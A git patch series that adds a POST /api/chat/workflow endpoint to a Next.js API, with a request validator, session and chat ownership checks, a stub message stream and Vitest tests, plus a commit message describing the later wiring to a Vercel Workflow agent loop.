From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 09:24:00 -0500
Subject: [PATCH 01/10] feat(chat-workflow): POST /api/chat/workflow route stub
 (PR 2 of 5) (#579)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f650) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/api/chat/workflow/route.ts                |  34 ++++
 .../handleChatWorkflowStream.test.ts          | 165 ++++++++++++++++++
 .../__tests__/validateChatWorkflow.test.ts    | 142 +++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          |  61 +++++++
 lib/chat/validateChatWorkflow.ts              |  61 +++++++
 5 files changed, 463 insertions(+)
 create mode 100644 app/api/chat/workflow/route.ts
 create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts
 create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts
 create mode 100644 lib/chat/handleChatWorkflowStream.ts
 create mode 100644 lib/chat/validateChatWorkflow.ts
diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts
new file mode 100644
index 000000000..19445c03b
--- /dev/null
+++ b/app/api/chat/workflow/route.ts
@@ -0,0 +1,34 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+
+export const maxDuration = 800;
+
+/**
+ * OPTIONS handler for CORS preflight requests.
+ *
+ * @returns A NextResponse with CORS headers.
+ */
+export async function OPTIONS() {
+  return new NextResponse(null, {
+    status: 200,
+    headers: getCorsHeaders(),
+  });
+}
+
+/**
+ * POST /api/chat/workflow
+ *
+ * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing
+ * session + chat. Currently returns a hardcoded UIMessage stream stub —
+ * the workflow is wired up in a follow-up PR.
+ *
+ * Contract: https://developers.recoupable.com/api-reference/chat/workflow
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function POST(request: NextRequest): Promise<Response> {
+  return handleChatWorkflowStream(request);
+}
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
new file mode 100644
index 000000000..c61911be8
--- /dev/null
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -0,0 +1,165 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({
+  validateChatWorkflow: vi.fn(),
+}));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
+  selectSessions: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({
+  selectChats: vi.fn(),
+}));
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({
+  isSandboxActive: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+
+function makeRequest(): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "test-key", "content-type": "application/json" },
+    body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }),
+  });
+}
+
+function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+  vi.mocked(validateChatWorkflow).mockResolvedValue({
+    messages: [],
+    chatId: CHAT_ID,
+    sessionId: SESSION_ID,
+    accountId: overrides.accountId ?? ACCOUNT_ID,
+    orgId: null,
+    authToken: "test-key",
+  });
+}
+
+function mockOwnedSessionWithActiveSandbox() {
+  mockValidatedRequest();
+  vi.mocked(selectSessions).mockResolvedValue([
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+  ]);
+  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
+  vi.mocked(isSandboxActive).mockReturnValue(true);
+}
+
+describe("handleChatWorkflowStream (stub)", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  describe("validation short-circuits", () => {
+    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(401);
+    });
+
+    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
+      const badBody = NextResponse.json(
+        { status: "error", error: "Invalid JSON body" },
+        { status: 400 },
+      );
+      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+    });
+  });
+
+  describe("session / chat ownership", () => {
+    beforeEach(() => mockValidatedRequest());
+
+    it("returns 404 when the session does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 500 when selectSessions errors (returns null)", async () => {
+      vi.mocked(selectSessions).mockResolvedValue(null);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+    });
+
+    it("returns 403 when the session is owned by a different account", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(403);
+    });
+
+    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(false);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(400);
+      const body = await res.json();
+      expect(body.error).toMatch(/sandbox/i);
+    });
+
+    it("returns 404 when the chat does not exist", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+
+    it("returns 404 when chat exists but belongs to a different session", async () => {
+      vi.mocked(selectSessions).mockResolvedValue([
+        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+      ]);
+      vi.mocked(isSandboxActive).mockReturnValue(true);
+      vi.mocked(selectChats).mockResolvedValue([
+        { id: CHAT_ID, session_id: "different-session" } as never,
+      ]);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(404);
+    });
+  });
+
+  describe("success (stub response)", () => {
+    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+
+    it("returns 200 with text/event-stream content type", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+    });
+
+    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const runId = res.headers.get("x-workflow-run-id");
+      expect(runId).toBeTruthy();
+      expect(runId!.startsWith("stub-")).toBe(true);
+    });
+
+    it("emits a stream body that includes the stub assistant text", async () => {
+      const res = await handleChatWorkflowStream(makeRequest());
+      const text = await res.text();
+      expect(text).toContain("Hello from /api/chat/workflow");
+    });
+  });
+});
diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts
new file mode 100644
index 000000000..8eb9457c2
--- /dev/null
+++ b/lib/chat/__tests__/validateChatWorkflow.test.ts
@@ -0,0 +1,142 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { NextRequest, NextResponse } from "next/server";
+
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+
+vi.mock("@/lib/auth/validateAuthContext", () => ({
+  validateAuthContext: vi.fn(),
+}));
+
+const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const CHAT_ID = "11111111-1111-1111-1111-111111111111";
+const SESSION_ID = "22222222-2222-2222-2222-222222222222";
+
+const validBody = {
+  messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }],
+  chatId: CHAT_ID,
+  sessionId: SESSION_ID,
+};
+
+function makeRequest(body: unknown = validBody): NextRequest {
+  return new NextRequest("http://localhost/api/chat/workflow", {
+    method: "POST",
+    headers: { "x-api-key": "k", "content-type": "application/json" },
+    body: typeof body === "string" ? body : JSON.stringify(body),
+  });
+}
+
+function mockAuthOk() {
+  vi.mocked(validateAuthContext).mockResolvedValue({
+    accountId: ACCOUNT_ID,
+    orgId: null,
+    authToken: "k",
+  });
+}
+
+describe("validateChatWorkflow", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  describe("valid input", () => {
+    beforeEach(() => mockAuthOk());
+
+    it("returns the validated body augmented with accountId / orgId / authToken", async () => {
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.chatId).toBe(CHAT_ID);
+      expect(result.sessionId).toBe(SESSION_ID);
+      expect(result.messages).toEqual(validBody.messages);
+      expect(result.accountId).toBe(ACCOUNT_ID);
+      expect(result.orgId).toBe(null);
+      expect(result.authToken).toBe("k");
+    });
+
+    it("accepts an optional context.contextLimit integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: 50 } }),
+      );
+      expect(result).not.toBeInstanceOf(NextResponse);
+      if (result instanceof NextResponse) return;
+      expect(result.context?.contextLimit).toBe(50);
+    });
+
+    it("accepts an empty messages array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] }));
+      expect(result).not.toBeInstanceOf(NextResponse);
+    });
+  });
+
+  describe("invalid body", () => {
+    it("returns 400 when JSON is malformed", async () => {
+      const req = new NextRequest("http://localhost/api/chat/workflow", {
+        method: "POST",
+        headers: { "x-api-key": "k", "content-type": "application/json" },
+        body: "{not-json",
+      });
+      const result = await validateChatWorkflow(req);
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is missing", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when sessionId is missing", async () => {
+      const { sessionId: _omit, ...rest } = validBody;
+      const result = await validateChatWorkflow(makeRequest(rest));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when messages is not an array", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when chatId is empty string", async () => {
+      const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" }));
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("returns 400 when context.contextLimit is not an integer", async () => {
+      const result = await validateChatWorkflow(
+        makeRequest({ ...validBody, context: { contextLimit: "fifty" } }),
+      );
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(400);
+    });
+
+    it("does not call validateAuthContext when body validation fails", async () => {
+      const { chatId: _omit, ...rest } = validBody;
+      await validateChatWorkflow(makeRequest(rest));
+      expect(validateAuthContext).not.toHaveBeenCalled();
+    });
+  });
+
+  describe("auth", () => {
+    it("returns the auth short-circuit response when validateAuthContext rejects", async () => {
+      const authError = NextResponse.json(
+        { status: "error", error: "Unauthorized" },
+        { status: 401 },
+      );
+      vi.mocked(validateAuthContext).mockResolvedValue(authError);
+      const result = await validateChatWorkflow(makeRequest());
+      expect(result).toBeInstanceOf(NextResponse);
+      if (!(result instanceof NextResponse)) return;
+      expect(result.status).toBe(401);
+    });
+  });
+});
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
new file mode 100644
index 000000000..137f699cb
--- /dev/null
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -0,0 +1,61 @@
+import { NextRequest, NextResponse } from "next/server";
+import { createUIMessageStream, createUIMessageStreamResponse } from "ai";
+import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
+import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
+import { selectChats } from "@/lib/supabase/chats/selectChats";
+import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
+import generateUUID from "@/lib/uuid/generateUUID";
+
+/**
+ * Handles POST /api/chat/workflow.
+ *
+ * Stub implementation: delegates auth + body validation to validateChatWorkflow,
+ * verifies ownership of the referenced session + chat, confirms the session's
+ * sandbox is active, then returns a hardcoded UIMessage stream with an
+ * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive
+ * the agent loop is wired up in a follow-up PR — this stub exists so clients
+ * can integrate against the contract documented at
+ * /api-reference/chat/workflow.
+ *
+ * @param request - The incoming NextRequest
+ * @returns A streaming Response (200) or a NextResponse error.
+ */
+export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> {
+  const validated = await validateChatWorkflow(request);
+  if (validated instanceof NextResponse) return validated;
+
+  const sessions = await selectSessions({ id: validated.sessionId });
+  if (sessions === null) return errorResponse("Internal server error", 500);
+  const session = sessions[0];
+  if (!session) return errorResponse("Session not found", 404);
+  if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403);
+  if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400);
+
+  const chats = await selectChats({ id: validated.chatId });
+  const chat = chats[0];
+  if (!chat || chat.session_id !== validated.sessionId) {
+    return errorResponse("Chat not found", 404);
+  }
+
+  const runId = `stub-${generateUUID()}`;
+
+  const stream = createUIMessageStream({
+    generateId: generateUUID,
+    execute: ({ writer }) => {
+      const id = generateUUID();
+      writer.write({ type: "text-start", id });
+      writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" });
+      writer.write({ type: "text-end", id });
+    },
+  });
+
+  return createUIMessageStreamResponse({
+    stream,
+    headers: {
+      ...getCorsHeaders(),
+      "x-workflow-run-id": runId,
+    },
+  });
+}
diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts
new file mode 100644
index 000000000..4fd8e6c66
--- /dev/null
+++ b/lib/chat/validateChatWorkflow.ts
@@ -0,0 +1,61 @@
+import type { NextRequest } from "next/server";
+import { NextResponse } from "next/server";
+import { z } from "zod";
+import { validateAuthContext } from "@/lib/auth/validateAuthContext";
+import { errorResponse } from "@/lib/networking/errorResponse";
+import { validationErrorResponse } from "@/lib/zod/validationErrorResponse";
+
+export const chatWorkflowBodySchema = z.object({
+  messages: z.array(z.any()),
+  chatId: z.string().min(1, "chatId is required"),
+  sessionId: z.string().min(1, "sessionId is required"),
+  context: z
+    .object({
+      contextLimit: z.number().int("contextLimit must be an integer"),
+    })
+    .optional(),
+});
+
+export type ChatWorkflowBody = z.infer<typeof chatWorkflowBodySchema>;
+
+export type ChatWorkflowRequest = ChatWorkflowBody & {
+  accountId: string;
+  orgId: string | null;
+  authToken?: string;
+};
+
+/**
+ * Validates a POST /api/chat/workflow request end-to-end: parses the JSON
+ * body, validates it against the schema, and runs auth via
+ * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403)
+ * or the typed body augmented with the authenticated accountId / orgId / token.
+ *
+ * @param request - The incoming NextRequest.
+ * @returns A NextResponse error or the validated, auth-augmented request.
+ */
+export async function validateChatWorkflow(
+  request: NextRequest,
+): Promise<NextResponse | ChatWorkflowRequest> {
+  let rawBody: unknown;
+  try {
+    rawBody = await request.json();
+  } catch {
+    return errorResponse("Invalid JSON body", 400);
+  }
+
+  const parsed = chatWorkflowBodySchema.safeParse(rawBody);
+  if (!parsed.success) {
+    const firstError = parsed.error.issues[0];
+    return validationErrorResponse(firstError.message, firstError.path);
+  }
+
+  const auth = await validateAuthContext(request);
+  if (auth instanceof NextResponse) return auth;
+
+  return {
+    ...parsed.data,
+    accountId: auth.accountId,
+    orgId: auth.orgId,
+    authToken: auth.authToken,
+  };
+}

From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 12:07:35 -0500
Subject: [PATCH 02/10] feat(chat-workflow): wire POST /api/chat/workflow to
 durable Vercel Workflow (PR 3 of 4) (#581)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  55 ++++
 app/lib/workflows/runAgentWorkflow.ts         |  56 ++++
 .../compareAndSetChatActiveStreamId.test.ts   |  51 +++
 .../handleChatWorkflowStream.test.ts          | 301 ++++++++++++++----
 .../__tests__/maybeResumeChatStream.test.ts   |  46 +++
 .../persistLatestUserMessage.test.ts          | 129 ++++++++
 .../reconcileExistingActiveStream.test.ts     |  92 ++++++
 lib/chat/agentCustomInstructions.ts           |   9 +
 lib/chat/assistantFileLinks.ts                |  28 ++
 lib/chat/compareAndSetChatActiveStreamId.ts   |  49 +++
 lib/chat/handleChatWorkflowStream.ts          | 100 ++++--
 lib/chat/maybeResumeChatStream.ts             |  40 +++
 lib/chat/persistLatestUserMessage.ts          |  84 +++++
 lib/chat/reconcileExistingActiveStream.ts     |  56 ++++
 lib/chat/recoupApiSkillPrompt.ts              |  11 +
 lib/recoupable/__tests__/extractOrgId.test.ts |  57 ++++
 lib/recoupable/extractOrgId.ts                |  31 ++
 .../__tests__/selectChatMessages.test.ts      |  58 ++++
 .../__tests__/upsertChatMessage.test.ts       |  46 +++
 .../chat_messages/selectChatMessages.ts       |  40 +++
 .../chat_messages/upsertChatMessage.ts        |  37 +++
 .../chats/__tests__/updateChat.test.ts        | 110 +++++++
 lib/supabase/chats/updateChat.ts              |  86 +++++
 23 files changed, 1478 insertions(+), 94 deletions(-)
 create mode 100644 app/lib/workflows/runAgentStep.ts
 create mode 100644 app/lib/workflows/runAgentWorkflow.ts
 create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
 create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts
 create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts
 create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts
 create mode 100644 lib/chat/agentCustomInstructions.ts
 create mode 100644 lib/chat/assistantFileLinks.ts
 create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts
 create mode 100644 lib/chat/maybeResumeChatStream.ts
 create mode 100644 lib/chat/persistLatestUserMessage.ts
 create mode 100644 lib/chat/reconcileExistingActiveStream.ts
 create mode 100644 lib/chat/recoupApiSkillPrompt.ts
 create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts
 create mode 100644 lib/recoupable/extractOrgId.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
 create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts
 create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts
